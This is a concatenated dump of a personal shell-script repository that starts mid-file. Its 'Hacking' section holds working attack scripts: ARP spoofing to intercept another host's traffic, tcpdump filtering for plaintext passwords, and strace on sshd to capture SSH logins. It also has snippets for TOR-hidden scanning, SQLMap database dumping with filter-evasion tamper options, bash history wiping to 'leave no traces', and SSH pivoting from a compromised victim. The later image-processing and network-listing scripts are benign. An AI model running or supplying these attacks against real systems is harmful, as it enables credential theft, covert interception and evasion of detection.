"alert" && echo "[XSS Found] $url" | tee -a output.txt 36 | done -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_host_traffic.sh: -------------------------------------------------------------------------------- 1 | s#!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_host_traffic.sh 6 | # 7 | # Description: A script that attempts to sniff the traffic of another machine 8 | # in the same subnet. 9 | # 10 | # Usage: ./sniff_host_traffic.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | NIC="eth0" 23 | GATEWAY_IP=192.168.0.1 24 | VICTIM_IP=192.168.0.123 25 | 26 | 27 | # FUNCTIONS -------------------------------------------------------------------- 28 | 29 | command_exists() { 30 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 31 | } 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | if [[ $EUID -ne 0 ]] ; then 37 | echo "This script must be run as root!" 1>&2 38 | 39 | exit 1 40 | fi 41 | 42 | declare -a CMDS=( 43 | "arpspoof" 44 | "dsniff" 45 | "tcpdump" 46 | ); 47 | 48 | for CMD in ${CMDS[@]} ; do 49 | command_exists $CMD 50 | done 51 | 52 | 53 | # MAIN ------------------------------------------------------------------------- 54 | 55 | VIPN=$(host $VICTIM_IP | grep -v 'not found' | head -1 | awk '{print $NF}') 56 | GTWN=$(host $GATEWAY_IP | grep -v 'not found' | head -1 | awk '{print $NF}') 57 | 58 | echo "INTERFACE: $NIC" 59 | echo "VICTIM: $VICTIM_IP ($VIPN)" 60 | echo "GATEWAY: $GATEWAY_IP ($GTWN)" 61 | 62 | sysctl -w net.ipv4.ip_forward=1 63 | arpspoof -t $VICTIM_IP $GATEWAY_IP 2&>/dev/null 64 | arpspoof -t $GATEWAY_IP $VICTIM_IP 2&>/dev/null 65 | dsniff -i $NIC -n 66 | 67 | echo 68 | echo "Run the following command in another terminal to see victim's traffic:" 69 | echo "tcpdump -v host $VICTIM_IP and not arp" 70 | 71 | echo 72 | echo "Run the following commands to stop the sniffing:" 73 | echo "killall arpspoof" 74 | echo "killall dsniff" 75 | echo "sysctl -w net.ipv4.ip_forward=0" 76 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_passwords_tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_passwords_tcpdump.sh 6 | # 7 | # Description: A script that sniffs the traffic on your machine looking for 8 | # plaintext credentials (HTTP, FTP, SMTP, IMAP, POP3, TELNET). 9 | # 10 | # Usage: ./sniff_passwords_tcpdump.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | NIC="eth0" 23 | 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists() { 28 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | if [[ $EUID -ne 0 ]] ; then 35 | echo "This script must be run as root!" 1>&2 36 | 37 | exit 1 38 | fi 39 | 40 | declare -a CMDS=( 41 | "egrep" 42 | "tcpdump" 43 | ); 44 | 45 | for CMD in ${CMDS[@]} ; do 46 | command_exists $CMD 47 | done 48 | 49 | 50 | # MAIN ------------------------------------------------------------------------- 51 | 52 | tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -lA -i "${NIC}" | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' 53 | 54 | -------------------------------------------------------------------------------- /Hacking/Penetration_Testing/sniff_ssh_credentials.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: sniff_ssh_credentials.sh 6 | # 7 | # Description: A script that sniffs usernames and passwords in plaintext. 8 | # You must be root on the server where SSH daemon is running. 9 | # The output will be something like: 10 | # 11 | # user1 12 | # password1 13 | # user2 14 | # password2 15 | # ... 16 | # 17 | # Usage: ./sniff_ssh_credentials.sh 18 | # 19 | # 20 | # --TODO-- 21 | # - improve sed regexp 22 | # - ??? 23 | # 24 | # 25 | ################################################################################ 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | 35 | # CHECKS ----------------------------------------------------------------------- 36 | 37 | if [[ $EUID -ne 0 ]] ; then 38 | echo "This script must be run as root!" 1>&2 39 | 40 | exit 1 41 | fi 42 | 43 | declare -a CMDS=( 44 | "strace" 45 | ); 46 | 47 | for CMD in ${CMDS[@]} ; do 48 | command_exists $CMD 49 | done 50 | 51 | 52 | # MAIN ------------------------------------------------------------------------- 53 | 54 | 55 | SSHD_PPID=$(ps axf | grep sshd | grep -v grep | grep -v 'sshd:' | awk '{ print $1 }') 56 | 57 | strace -f -p $SSHD_PPID 2>&1 | grep --line-buffered -F 'read(6' | grep --line-buffered -E '\\10\\0\\0\\0|\\f\\0\\0\\0' | grep --line-buffered -oP '(?<=, ").*(?=",)' | sed -e 's/\\[[:alnum:]]//g' 58 | 59 | -------------------------------------------------------------------------------- /Hacking/snippets.txt: -------------------------------------------------------------------------------- 1 | # reverse DNS lookups via TOR (using findomain) 2 | torify findomain -t example.com 3 | 4 | 5 | 6 | # resolve a domain name via TOR 7 | tor-resolve www.example.com 127.0.0.1:9050 8 | 9 | 10 | 11 | # enumerate directories and files using DirSearch via TOR 12 | torify dirsearch -u https://www.example.com/ -e php -f --random-user-agents --suppress-empty -x 301,302,401,403,404 13 | 14 | 15 | 16 | # enumerate directories and files using Dirble via TOR 17 | torify dirble https://www.example.com/ -w /tmp/wordlist.txt -x .php,.html 18 | 19 | 20 | 21 | # enumerate directories and files using LulzBuster (https://packetstormsecurity.com/files/download/156406/lulzbuster-1.2.0.tar.xz) via TOR 22 | lulzbuster -s https://www.example.com/ -x 301,302,400,401,402,403,404,500 -U -w lists/small.txt -i -p socks5://localhost:9050 23 | 24 | 25 | 26 | # scrape site with Photon OSINT scanner via TOR 27 | torify photon -u https://www.example.com/ -o /tmp/XX -v --keys --dns 28 | 29 | 30 | 31 | # dump a DB using SQLMap via TOR 32 | sqlmap --check-tor --tor --random-agent -u 'https://www.example.com/test.php?id=1' 33 | sqlmap --check-tor --tor --random-agent -u 'https://www.example.com/test.php?id=1' --tamper="between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor" 34 | 35 | 36 | 37 | # scan a WordPress site using WPScan via TOR 38 | wpscan --url www.example.com --rua --disable-tls-checks -e vp,vt,cb,dbe,u --proxy socks5://127.0.0.1:9050 39 | 40 | 41 | 42 | # use Nikto via TOR 43 | proxychains nikto -host https://example.com/ -useragent "Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 44 | 45 | 46 | 47 | # fetch a web content using cURL via TOR 48 | curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" -s --socks5-hostname 127.0.0.1:9050 https://www.example.com 49 | 50 | 51 | 52 | # browse a website with LINKS (CLI) via TOR 53 | links -only-proxies 1 -socks-proxy 127.0.0.1:9050 https://ipleak.org/ 54 | 55 | 56 | 57 | # get info about your IP address when using TOR (via Mullvad VPN service) 58 | curl -s --socks5-hostname 127.0.0.1:9050 https://am.i.mullvad.net/json | jq 59 | 60 | 61 | 62 | # delete BASH history and avoid saving commands (= leave no traces) 63 | history -c 64 | rm -f $HISTFILE 65 | unset HISTFILE 66 | set +o history 67 | export HISTSIZE=0 68 | export HISTFILESIZE=0 69 | # one-liner 70 | history -c ; rm -f $HISTFILE ; unset HISTFILE ; set +o history ; export HISTSIZE=0 ; export HISTFILESIZE=0 71 | 72 | 73 | 74 | # upgrade a shell to a fully functional interactive shell 75 | python -c 'import pty; pty.spawn("/bin/bash")' 76 | -> CTRL+Z 77 | stty raw -echo 78 | fg 79 | reset 80 | 81 | 82 | 83 | # complete DNS enumeration with AMASS 84 | amass -v -whois -ip -active -brute -d example.com 85 | 86 | 87 | 88 | # directly connect to SQL databases with SQLMap 89 | sqlmap -d 'mysql://$USERNAME:$PASSWORD@$HOST:3306/$DATABASE' -v 3 --dbs --tables 90 | sqlmap -d 'mssql://$USERNAME:$PASSWORD@$HOST:1433/$DATABASE' -v 3 --dbs --tables 91 | 92 | 93 | 94 | # convert WPA-PSK captured handshake to hash (suitable for John The Ripper) 95 | /usr/lib/hashcat-utils/cap2hccapx.bin file.cap file.hccapx 96 | hccap2john file.hccapx >> hashes.txt 97 | 98 | 99 | 100 | # pivoting by executing a SOCKS5 server on a compromised target and forwarding the local port remotely via SSH 101 | # -> on your attacking machine: 102 | TARGET=victim 103 | mkdir -p /tmp/targets/$TARGET 104 | useradd -m -s /bin/nologin $TARGET 105 | ssh-keygen -t ecdsa -f /tmp/targets/$TARGET/sshkey -q -N "" 106 | mkdir /home/$TARGET/.ssh 107 | cp /tmp/targets/$TARGET/sshkey.pub /home/$TARGET/.ssh/authorized_keys 108 | chown -R $TARGET:$TARGET /home/$TARGET/.ssh 109 | chmod 600 /home/$TARGET/.ssh/authorized_keys 110 | cat /tmp/targets/$TARGET/sshkey 111 | (copy private key content) 112 | # -> on the victim machine: 113 | echo "pasted sshkey content" >> /tmp/.keyfile 114 | chmod 600 /tmp/.keyfile 115 | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT $TARGET@attackingmachine 116 | # -> on your attacking machine: 117 | ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT 118 | 119 | 120 | 121 | # videos on YouTube with a very simple explanation on how to use the ZeroLogon exploit () 122 | https://www.youtube.com/watch?v=3xEk6ZaBMJ8 123 | https://www.youtube.com/watch?v=kGIDY-sF1Hk 124 | 125 | 126 | 127 | # update OpenVAS feeds 128 | runuser -u _gvm -- greenbone-nvt-sync 129 | runuser -u _gvm -- greenbone-scapdata-sync 130 | runuser -u _gvm -- greenbone-certdata-sync 131 | runuser -u _gvm -- greenbone-feed-sync --type GVMD_DATA 132 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | This is free and unencumbered software released into the public domain. 2 | 3 | Anyone is free to copy, modify, publish, use, compile, sell, or 4 | distribute this software, either in source code form or as a compiled 5 | binary, for any purpose, commercial or non-commercial, and by any 6 | means. 7 | 8 | In jurisdictions that recognize copyright laws, the author or authors 9 | of this software dedicate any and all copyright interest in the 10 | software to the public domain. We make this dedication for the benefit 11 | of the public at large and to the detriment of our heirs and 12 | successors. We intend this dedication to be an overt act of 13 | relinquishment in perpetuity of all present and future rights to this 14 | software under copyright law. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 17 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 18 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 19 | IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR 20 | OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, 21 | ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR 22 | OTHER DEALINGS IN THE SOFTWARE. 23 | 24 | For more information, please refer to 25 | -------------------------------------------------------------------------------- /Media/aspectpad: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Developed by Fred Weinhaus 12/1/2009 .......... revised 11/2/2016 4 | # 5 | # ------------------------------------------------------------------------------ 6 | # 7 | # Licensing: 8 | # 9 | # Copyright © Fred Weinhaus 10 | # 11 | # My scripts are available free of charge for non-commercial use, ONLY. 12 | # 13 | # For use of my scripts in commercial (for-profit) environments or 14 | # non-free applications, please contact me (Fred Weinhaus) for 15 | # licensing arrangements. My email address is fmw at alink dot net. 16 | # 17 | # If you: 1) redistribute, 2) incorporate any of these scripts into other 18 | # free applications or 3) reprogram them in another scripting language, 19 | # then you must contact me for permission, especially if the result might 20 | # be used in a commercial or for-profit environment. 21 | # 22 | # My scripts are also subject, in a subordinate manner, to the ImageMagick 23 | # license, which can be found at: http://www.imagemagick.org/script/license.php 24 | # 25 | # ------------------------------------------------------------------------------ 26 | # 27 | # USAGE: aspectpad [-a aspect] [-m mode] [-p pcolor] [-t toler] infile outfile 28 | # USAGE: aspectpad [-help] 29 | # 30 | # OPTIONS: 31 | # 32 | # -a aspect aspect ratio value desired; float>=1; default=2 33 | # -m mode mode for aspect; al, ap, l or p; default=al 34 | # l=force landscape pad; p=force portrait pad; 35 | # al=automatic pad (landscape for square images); 36 | # ap=automatic pad (portrait for square images) 37 | # -p pcolor pad color; any valid IM color; default=black 38 | # -t toler aspect tolerance; float>=0; if absolute difference 39 | # between desired aspect and image aspect is less 40 | # than or equal to tolerance, then no padding; 41 | # default=0 42 | # 43 | ### 44 | # 45 | # NAME: ASPECTPAD 46 | # 47 | # PURPOSE: To pad an image with a color to a specified aspect ratio 48 | # and orientation. 49 | # 50 | # DESCRIPTION: ASPECTPAD pads an image with a color to a specified aspect 51 | # ratio and orientation. The user can choose to force the pad to either 52 | # landscape or portrait orientation or preserve the orientation in automatic 53 | # mode. All padding will result in the image being centered. 54 | # 55 | # OPTIONS: 56 | # 57 | # -a aspect ... ASPECT is the desired aspect ratio. Values are floats>=1. 58 | # The default=2 59 | # 60 | # -m mode ... MODE is the padding mode. Choices are: l, p, al or ap. When 61 | # mode=l, the padding will force the result to be landscape at the desired 62 | # aspect value. When mode=p, the padding will force the result to be portrait. 63 | # When mode=al, the padding will preserve the aspect of the original image, but 64 | # will pad a square image into landscape format. When mode=ap, the padding will 65 | # preserve the aspect of the original image, but will pad a square image into 66 | # portrait format. The default=al. 67 | # 68 | # -p pcolor ... PCOLOR is the desired padding color. Any valid IM color 69 | # specification may be used. The default=black 70 | # 71 | # -t toler ... TOLER is the aspect tolerance. If the absolute difference 72 | # between desired aspect and image aspect is less than or equal to toler, 73 | # then no padding will be applied. Values are floats>=0. The default=0 74 | # 75 | # CAVEAT: No guarantee that this script will work on all platforms, 76 | # nor that trapping of inconsistent parameters is complete and 77 | # foolproof. Use At Your Own Risk. 78 | # 79 | ###### 80 | # 81 | 82 | # set default values 83 | aspect="2" # aspect>=1 84 | mode="al" # al, ap, l, p; a=auto 85 | pcolor="black" # pad color 86 | toler=0 # toler>=0 87 | 88 | # set directory for temporary files 89 | dir="." # suggestions are dir="." or dir="/tmp" 90 | 91 | # set up functions to report Usage and Usage with Description 92 | PROGNAME=`type $0 | awk '{print $3}'` # search for executable on path 93 | PROGDIR=`dirname $PROGNAME` # extract directory of program 94 | PROGNAME=`basename $PROGNAME` # base name of program 95 | usage1() 96 | { 97 | echo >&2 "" 98 | echo >&2 "$PROGNAME:" "$@" 99 | sed >&2 -e '1,/^####/d; /^###/g; /^#/!q; s/^#//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME" 100 | } 101 | usage2() 102 | { 103 | echo >&2 "" 104 | echo >&2 "$PROGNAME:" "$@" 105 | sed >&2 -e '1,/^####/d; /^######/g; /^#/!q; s/^#*//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME" 106 | } 107 | 108 | 109 | # function to report error messages 110 | errMsg() 111 | { 112 | echo "" 113 | echo $1 114 | echo "" 115 | usage1 116 | exit 1 117 | } 118 | 119 | 120 | # function to test for minus at start of value of second part of option 1 or 2 121 | checkMinus() 122 | { 123 | test=`echo "$1" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise 124 | [ $test -eq 1 ] && errMsg "$errorMsg" 125 | } 126 | 127 | # test for correct number of arguments and get values 128 | if [ $# -eq 0 ] 129 | then 130 | # help information 131 | echo "" 132 | usage2 133 | exit 0 134 | elif [ $# -gt 10 ] 135 | then 136 | errMsg "--- TOO MANY ARGUMENTS WERE PROVIDED ---" 137 | else 138 | while [ $# -gt 0 ] 139 | do 140 | # get parameter values 141 | case "$1" in 142 | -help) # help information 143 | echo "" 144 | usage2 145 | exit 0 146 | ;; 147 | -m) # get mode 148 | shift # to get the next parameter 149 | # test if parameter starts with minus sign 150 | errorMsg="--- INVALID MODE SPECIFICATION ---" 151 | checkMinus "$1" 152 | mode=`echo "$1" | tr '[A-Z]' '[a-z]'` 153 | case "$mode" in 154 | l) ;; 155 | p) ;; 156 | al) ;; 157 | ap) ;; 158 | *) errMsg "--- MODE=$mode IS AN INVALID VALUE ---" 159 | esac 160 | ;; 161 | -a) # get aspect 162 | shift # to get the next parameter 163 | # test if parameter starts with minus sign 164 | errorMsg="--- INVALID ASPECT SPECIFICATION ---" 165 | checkMinus "$1" 166 | aspect=`expr "$1" : '\([.0-9]*\)'` 167 | aspecttest=`echo "$aspect < 1" | bc` 168 | [ $aspecttest -eq 1 ] && errMsg "--- ASPECT=$aspect MUST BE A FLOAT GREATER THAN OR EQUAL TO 1 ---" 169 | ;; 170 | -p) # get pcolor 171 | shift # to get the next parameter 172 | # test if parameter starts with minus sign 173 | errorMsg="--- INVALID PCOLOR SPECIFICATION ---" 174 | checkMinus "$1" 175 | pcolor="$1" 176 | ;; 177 | -t) # get toler 178 | shift # to get the next parameter 179 | # test if parameter starts with minus sign 180 | errorMsg="--- INVALID TOLER SPECIFICATION ---" 181 | checkMinus "$1" 182 | toler=`expr "$1" : '\([.0-9]*\)'` 183 | tolertest=`echo "$toler < 0" | bc` 184 | [ $tolertest -eq 1 ] && errMsg "--- TOLER=$toler MUST BE A NON-NEGATIVE FLOAT ---" 185 | ;; 186 | -) # STDIN and end of arguments 187 | break 188 | ;; 189 | -*) # any other - argument 190 | errMsg "--- UNKNOWN OPTION ---" 191 | ;; 192 | *) # end of arguments 193 | break 194 | ;; 195 | esac 196 | shift # next option 197 | done 198 | # 199 | # get infile and outfile 200 | infile="$1" 201 | outfile="$2" 202 | fi 203 | 204 | # test that infile provided 205 | [ "$infile" = "" ] && errMsg "NO INPUT FILE SPECIFIED" 206 | 207 | # test that outfile provided 208 | [ "$outfile" = "" ] && errMsg "NO OUTPUT FILE SPECIFIED" 209 | 210 | # setup temporary images 211 | tmpA1="$dir/aspectpad_1_$$.mpc" 212 | tmpA2="$dir/aspectpad_1_$$.cache" 213 | trap "rm -f $tmpA1 $tmpA2;" 0 214 | trap "rm -f $tmpA1 $tmpA2; exit 1" 1 2 3 15 215 | trap "rm -f $tmpA1 $tmpA2; exit 1" ERR 216 | 217 | 218 | # read the input image and test validity. 219 | convert -quiet "$infile" +repage "$tmpA1" || 220 | errMsg "--- FILE $infile DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---" 221 | 222 | # get size and aspect ratio of input 223 | ww=`convert $tmpA1 -ping -format "%w" info:` 224 | hh=`convert $tmpA1 -ping -format "%h" info:` 225 | wratio=`convert xc: -format "%[fx:$ww/$hh]" info:` 226 | hratio=`convert xc: -format "%[fx:$hh/$ww]" info:` 227 | #echo "ww=$ww; hh=$hh wratio=$wratio; hratio=$hratio" 228 | 229 | # test if aspect >= ratio 230 | wtest=`convert xc: -format "%[fx:$aspect>=$wratio?1:0]" info:` 231 | htest=`convert xc: -format "%[fx:$aspect>=$hratio?1:0]" info:` 232 | #echo "wtest=$wtest; htest=$htest" 233 | 234 | # test if within toler of desired aspect 235 | tratio=`convert xc: -format "%[fx:$wratio>=1?$wratio:$hratio]" info:` 236 | ttest=`convert xc: -format "%[fx:abs($tratio-$aspect)<=$toler?1:0]" info:` 237 | #echo "tratio=$tratio; ttest=$ttest" 238 | 239 | # copy input to output if image aspect is within toler 240 | if [ $ttest -eq 1 ]; then 241 | convert $tmpA1 "$outfile" 242 | exit 243 | fi 244 | 245 | # force landscape mode 246 | if [ "$mode" = "l" -a $wtest -eq 1 ]; then 247 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 248 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 249 | exit 250 | elif [ "$mode" = "l" -a $wtest -eq 0 ]; then 251 | hh=`convert xc: -format "%[fx:$hh*$wratio/$aspect]" info:` 252 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 253 | exit 254 | fi 255 | 256 | # force portrait mode 257 | if [ "$mode" = "p" -a $htest -eq 1 ]; then 258 | hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 259 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 260 | exit 261 | elif [ "$mode" = "p" -a $htest -eq 0 ]; then 262 | ww=`convert xc: -format "%[fx:$ww*$hratio/$aspect]" info:` 263 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 264 | exit 265 | fi 266 | 267 | 268 | # auto square image 269 | if [ "$mode" = "al" -a $ww -eq $hh ]; then 270 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 271 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 272 | exit 273 | elif [ "$mode" = "ap" -a $ww -eq $hh ]; then 274 | hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 275 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 276 | exit 277 | fi 278 | 279 | 280 | # auto landscape image 281 | if [ $ww -gt $hh -a $wtest -eq 1 ]; then 282 | ww=`convert xc: -format "%[fx:$hh*$aspect]" info:` 283 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 284 | exit 285 | elif [ $ww -gt $hh -a $wtest -eq 0 ]; then 286 | hh=`convert xc: -format "%[fx:$hh*$wratio/$aspect]" info:` 287 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 288 | exit 289 | fi 290 | 291 | 292 | # auto portrait image 293 | if [ $hh -gt $ww -a $htest -eq 1 ]; then 294 | hh=`convert xc: -format "%[fx:$ww*$aspect]" info:` 295 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 296 | exit 297 | elif [ $hh -gt $ww -a $htest -eq 0 ]; then 298 | ww=`convert xc: -format "%[fx:$ww*$hratio/$aspect]" info:` 299 | convert $tmpA1 -gravity center -background "$pcolor" -extent ${ww}x${hh} "$outfile" 300 | exit 301 | fi 302 | 303 | -------------------------------------------------------------------------------- /Media/image_orientation.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: image_orientation.sh 6 | # 7 | # Description: A script that, for every image in a folder, prints its pixel 8 | # resolution and its orientation (portrait, landscape or squared). 9 | # The script "aspectpad" by Fred Weinhaus is required. 10 | # 11 | # Usage: ./image_orientation.sh 12 | # 13 | # 14 | # --TODO-- 15 | # - ??? 16 | # 17 | # 18 | ################################################################################ 19 | 20 | 21 | # FUNCTIONS -------------------------------------------------------------------- 22 | 23 | command_exists() { 24 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" 1>&2 ; exit 1 ; } 25 | } 26 | 27 | 28 | # CHECKS ----------------------------------------------------------------------- 29 | 30 | declare -a CMDS=( 31 | "identify" 32 | ); 33 | 34 | for CMD in ${CMDS[@]} ; do 35 | command_exists $CMD 36 | done 37 | 38 | 39 | # MAIN ------------------------------------------------------------------------- 40 | 41 | if [[ "$#" -eq 0 ]] ; then 42 | echo "./image_orientation.sh " 43 | 44 | exit 1 45 | fi 46 | 47 | DIR=$1 48 | 49 | if [[ ! -d "$DIR" ]] ; then 50 | echo "Error! Directory with images not found: $DIR" 51 | 52 | exit 1 53 | fi 54 | 55 | SCR_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null && pwd)" 56 | OLD_DIR=$(pwd) 57 | 58 | if [[ ! -x "$SCR_DIR/aspectpad" ]] ; then 59 | echo "Error! Script \"aspectpad\" not found (it must be in the same directory of this script)." 60 | 61 | exit 1 62 | fi 63 | 64 | cd $1 65 | for IMG in $(ls -1 *jpg *JPG *png *PNG 2> /dev/null) ; do 66 | SIZE=$(identify -format '%w %h' $IMG | sed -e 's/\ /x/g') 67 | W=$(echo $SIZE | cut -d'x' -f1) 68 | H=$(echo $SIZE | cut -d'x' -f2) 69 | 70 | if (( $W > $H )) ; then 71 | FORMAT="landscape" 72 | $SCR_DIR/aspectpad -a 1.5 -m l -p black $IMG new/$IMG 73 | elif (( $W < $H )) ; then 74 | FORMAT="portrait" 75 | $SCR_DIR/aspectpad -a 1.5 -m p -p black $IMG new/$IMG 76 | else 77 | FORMAT="squared" 78 | fi 79 | 80 | echo "$IMG $SIZE $FORMAT" 81 | done 82 | 83 | cd $OLD_DIR 84 | -------------------------------------------------------------------------------- /Media/snippets.txt: -------------------------------------------------------------------------------- 1 | # reduce the size of a bunch of images at a 50% ratio 2 | mkdir out ; for IMG in *jpg ; do convert -resize 50% $IMG out/$IMG ; done 3 | -------------------------------------------------------------------------------- /Networking/get_nics_with_ip_mac_status.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: get_nics_with_ip_mac_status.sh 6 | # 7 | # Description: A script that returns a list of all the NICs with their IP and 8 | # MAC addresses plus their status. Works on GNU/Linux only. 9 | # 10 | # Usage: ./get_nics_with_ip_mac_status.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - Fix code to get NICs list on RHEL 7 15 | # - Add support for other Unix systems 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # FUNCTIONS -------------------------------------------------------------------- 23 | 24 | command_exists() { 25 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 26 | } 27 | 28 | display_usage() { 29 | echo "Usage: $0" 30 | } 31 | 32 | 33 | # CHECKS ----------------------------------------------------------------------- 34 | 35 | declare -a CMDS=( 36 | "ifconfig" 37 | "ip" 38 | ); 39 | 40 | for CMD in ${CMDS[@]} ; do 41 | command_exists $CMD 42 | done 43 | 44 | 45 | # MAIN ------------------------------------------------------------------------- 46 | 47 | if [[ $# -ne 0 ]] ; then 48 | display_usage 49 | 50 | exit 1 51 | else 52 | # The following command *does not* work on RHEL 7 (ifconfig output format has changed) 53 | #for NIC in $(ifconfig -a | sed 's/[ \t].*//;/^\(lo\|\)$/d;/:/d') ; do 54 | for NIC in $(ifconfig -s | grep -v Iface | awk '{print $1}' | grep -v lo | grep -v inet6) ; do 55 | MAC=$(ip addr show $NIC | grep 'link/ether' | awk '{print $2}') 56 | STATUS=$(ip -4 addr show $NIC | grep -o 'state [^ ,]\+' | sed 's/state\ //g') 57 | 58 | if [[ "$STATUS" != "UP" ]] ; then 59 | printf "%-20s %-18s %-10s %-8s\n" $MAC " " $NIC $STATUS 60 | else 61 | printf "%-20s %-18s %-10s %-8s\n" MAC IP NIC STATUS 62 | echo "------------------------------------------------------------" 63 | 64 | while read -r ROW ; do 65 | IP=$(echo $ROW | awk '{print $2}' | sed 's/\/.*//') 66 | IFACE=$(echo $ROW | awk 'NF>1{print $NF}') 67 | 68 | printf "%-20s %-18s %-10s %-8s\n" $MAC $IP $IFACE $STATUS 69 | done < <(ip -4 addr show $NIC | grep inet) 70 | fi 71 | done 72 | fi 73 | -------------------------------------------------------------------------------- /Networking/get_nics_with_ip_mac_status_freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: get_nics_with_ip_mac_status_freebsd.sh 6 | # 7 | # Description: A script that returns a list of all the NICs with their IP and 8 | # MAC addresses plus their status. Works on FreeBSD only. 9 | # 10 | # Usage: ./get_nics_with_ip_mac_status_freebsd.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | display_usage() { 27 | echo "Usage: $0" 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | declare -a CMDS=( 34 | "ifconfig" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | 42 | # MAIN ------------------------------------------------------------------------- 43 | 44 | if [[ $# -ne 0 ]] ; then 45 | display_usage 46 | 47 | exit 1 48 | else 49 | echo 50 | echo "Interface | MAC address | IP address | Status" 51 | echo "----------+----------------------+----------------------+-----------" 52 | 53 | for IF in $(ifconfig -l) ; do 54 | MA=$(ifconfig $IF | grep -w ether | awk '{print $2}') 55 | IP=$(ifconfig $IF | grep -w inet | awk '{print $2}') 56 | ST=$(ifconfig $IF | grep -w status | cut -d':' -f2) 57 | 58 | printf 